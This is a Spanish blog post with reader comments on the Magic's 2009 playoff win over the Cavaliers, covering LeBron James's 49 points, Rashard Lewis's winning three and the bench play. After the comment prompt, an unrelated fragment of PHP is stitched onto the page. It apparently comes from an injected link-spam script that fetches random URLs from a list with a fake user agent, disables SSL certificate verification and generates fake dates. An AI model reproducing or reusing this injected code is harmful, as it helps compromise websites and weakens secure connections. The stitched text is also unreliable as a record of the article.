Playoffs (20/05/2009): Un obús y un reloj roto

21 de May de 2009 por TheDeerHunter

rashlewisHay quien dice que existen derrotas que al final resultan útiles. Mike Brown nos vende este argumento con aparente convicción. Al fin y al cabo, dice, “no esperábamos seguir imbatidos indefinidamente”.

No dudamos que sea así, pero estamos seguros de que no esperaban que la primera derrota cayera anoche, con el partido controlado durante la primera parte, con 15 puntos de ventaja al descanso rubricados por una bomba desde tres cuartos de pista por “Sweet Mo”. No esperarían caer en su templo irreductible del Quicken Loans, donde esta temporada todavía no habían perdido (salvo su partido de regular season contra Lakers) en una noche en la que LeBron anotó 49 de los 106 puntos totales del equipo. Pero seguro que no esperaban que Orlando fuese a anotar más del 55% de sus tiros contra la teórica mejora defensa de la liga.

LeBron fue mucho más sincero en sus declaraciones: “Este 55% es inaceptable. Teníamos que perder por fuerza. No jugábamos desde el 11 de mayo e inevitablemente lo teníamos que notar.”

Orlando jugó sus cartas con acierto. Aguantó el chaparrón, aseguró sus lanzamientos a fin de evitar contraataques, jugó por dentro y abusó de un Dwight Howard que, por primera vez en la postemporada, lanzó casi el doble que cualquiera de sus compañeros. Lo de lanzar, claro, es un eufemismo. Para Superman el cargarse el reloj de la canasta a golpe mate es lo que se entiende como lanzar a canasta…

dwightclockEl caso es que movieron bien la bola y lanzaron cómodos. Turkoglu hizo daño de point forward con 14 asistencias, que se sumaron a las 8 de Alston. Y si no eran capaces de parar a LeBron, se aplicaron contra el resto. West y Williams no estuvieron finos y por dentro no iban a desequilibrar.

Finalmente es que una extraordinaria efectividad de Lewis y la gran actuación de la segunda unidad terminaron por decantar el partido. Precisamente Lewis anotó el triple que selló la victoria.

Hablar ahora de la ventaja campo no tiene demasiado sentido pero los Cavs se juegan la vida el viernes. Habrá que ver cómo de preparados están para esta situación. Por lo demás, el análisis no cambia.

PREMIOS

MVP: Tal vez no hiciera las estadísticas de sus compañeros Turkoglu o Howard, pero Rashard Lewis anotó las tres últimas canastas en juego de su equipo, 8 puntos en los últimos 2:30 que incluyeron el triple de la victoria para los Magic. Lewis acabó con 9 de 13 en tiros de campo, 7 rebotes y 3 asistencias, además de gran parte del mérito del triunfo.

La sorpresa: Uno de los factores desequilibrantes fue la aportación del banquillo de los Magic. Pietrus, Johnson, Battie y Gortat sumaron 25 puntos con 10 de 17 en tiros, además de 7 rebotes y 4 asistencias que lebmagiccontribuyeron enormemente en la remontada de los de Florida.

La decepción: Por contra, los suplentes de los Cavs estuvieron para olvidar. Cuatro jugadores del calibre de Szczerbiak, Ben Wallace y Daniel Gibson no anotaron un solo punto, mientras que Joe Smith se quedó en apenas 5.

El mayor esfuerzo en vano: 20 de 30 en tiros de campo, 8 asistencias, 6 rebotes, 3 tapones, 2 recuperaciones… Lo de LeBron sigue siendo descomunal, aunque estábamos acostumbrado a que tales exhibiciones sirviesen para ganar el partido.

RAZONES PARA TRASNOCHAR

Turno para Lakers y Nuggets. Los de Colorado tienen la difícil tarea de olvidar la ocasión perdida en el primer partido, que dominaron hasta los últimos minutos, cuando la inspiración de Bryant y un robo de Ariza decantaron la balanza del lado local. Si Melo mantiene el estratosférico nivel mostrado el martes y Pau, Bynum y Odom no mejoran sus prestaciones, difícilmente podrán los Lakers viajar a Denver con un 2-0, aunque los angelinos están demostrando su capacidad para responder ante la exigencia del rival. El segundo partido de la serie se juega esta próxima madrugada, a partir de las 3.00 (hora peninsular española).

Comenta

8 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    Dos detalles extra:
    En la foto se ve una imagen renqueante de Lebron que ha alarmado algunos, aunque él asegura que está bien.
    Nelson dice que podría reaparecer durante esta serie. Menudo refuerzo y en qué momento sería. Luego está por ver cómo llega.

      Citar

  2. MagicJohnson32 dice:
    #2

    Sorpresa, no tanto por la victoria sino por el modo. Parecía durante la primera mitad que Cleveland mantenía su línea de arrasar rivales. El triplazo de Mo desde su casa era como para que los Magic se fuesen al hotel. Han demostrado una dureza mental impresionante para levantarse y remontar.

    Y sin embargo, sigo viendo a los Cavs claros favoritos.

      Citar

  3. Txusma dice:
    #3

    Parece ser que en Orlando se han dejado de tonterias. Balones a Dwight para que destroce la zona de los Cavs aunq siempre hecho en falta que no acabe el partido con mas asistencias. Bola q toca, bola que se juega? Pq un fuera-dentro-fuera con los cañoneros que hay tras la linea de 3 debe hacer daño al más pintado. Si Turkoglu y Lewis juegan a este nivel, la eliminatoria va a ser de lo mas interesante.

      Citar

  4. telekoman dice:
    #4

    Es fácil saber por que no hacen lo del fuera – dentro – fuera. Está tan poco acostumbrado a que le pasen los balones, que para alguna que le pasan no la va a sacar fuera. Aparte de que dudo mucho que le llegue la sangre a la cabeza (por lo alto que es) como para pensar en algo tan complejo.

      Citar

  5. couxe dice:
    #5

    Hace unos días comenté que los Cavs no eran tan favoritos como se estaba diciendo y pronosticando, principalmente porque a pesar de haber arrasado en las dos primeras series, en esos 8 partidos ninguno de sus rivales les plantó minimamente cara…
    Ayer, primer partido de las finales de conferencia contra un rival de entidad, y ante el primer problema, primera hostia… Cuando no se está acostumbrado a sufrir suelen suceder estas cosas…
    Aún así, veo a los Cavs como favoritos, siempre y cuando LeBron siga como hasta ahora, y me imagino que llegarán a la final, aunque sufriendo. Apuesto por un 4-3…

      Citar

  6. ÑBA dice:
    #6

    Stan Van Gundy ha demostrado que además de rodar películas X sabe entrenar baloncesto… jejej

      Citar

  7. Kantonyo dice:
    #7

    La recuperación de Nelson sería importantísima. Y más aún si es al nivel que estaba cuando la lesión.

      Citar

  8. xapa_croack dice:
    #8

    Ayer lebron estaba en el mas puro estado kobe, sobre todo la 2a parte que fui la que vi, donde estan mis compañeros????

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>